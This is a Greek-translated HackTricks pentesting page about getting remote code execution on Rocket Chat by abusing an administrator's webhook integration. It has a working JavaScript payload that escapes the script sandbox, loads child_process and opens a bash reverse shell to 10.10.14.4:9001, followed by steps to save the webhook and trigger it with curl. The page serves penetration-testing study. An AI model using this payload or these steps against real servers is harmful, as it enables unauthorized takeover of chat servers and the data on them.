hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

5 KiB
Raw Blame History

Rocket Chat

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

RCE

Εάν είστε διαχειριστής μέσα στο Rocket Chat μπορείτε να αποκτήσετε RCE.

  • Πηγαίνετε στις Ενσωματώσεις και επιλέξτε Νέα Ενσωμάτωση και επιλέξτε οποιαδήποτε: Εισερχόμενη WebHook ή Εξερχόμενη WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Ρύθμιση του WebHook (ο κανάλι και το όνομα χρήστη για την ανάρτηση πρέπει να υπάρχουν):
  • Ρύθμιση του script του WebHook:
  • Αποθήκευση των αλλαγών
  • Λήψη του δημιουργημένου URL του WebHook:
  • Καλέστε το με την εντολή curl και θα πρέπει να λάβετε το αντίστοιχο αντίστροφο κέλυφος (rev shell)
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: